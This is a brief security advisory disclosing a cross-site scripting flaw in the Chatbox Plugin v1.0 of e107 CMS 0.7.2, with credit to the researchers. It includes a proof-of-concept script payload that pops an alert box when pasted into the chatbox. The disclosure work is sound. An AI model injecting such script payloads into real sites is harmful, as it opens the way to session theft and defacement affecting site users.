Software: e107 CMS 0.7.2 Software Details: Chatbox Plugin v1.0 Class: Remote Type: XSS ========== Desription =========== XSS vulnerability exists in e107 0.7.2 CMS. user input is not correctly sanitized in Chatbox Plugin v1.0. ========== Exploit ============= just paste sample code to a Chatbox: <script>alert("xss vuln found by ssteam")</script> Discovered by: marc & shb (ssteam.pl@xxxxxxxxx) Regards, marc & shb